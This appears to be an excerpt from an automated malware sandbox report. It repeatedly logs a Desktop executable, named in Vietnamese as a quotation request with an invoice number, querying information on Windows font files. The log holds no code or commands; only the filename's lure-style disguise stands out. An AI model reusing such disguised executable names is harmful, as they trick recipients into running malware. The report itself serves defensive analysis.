Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
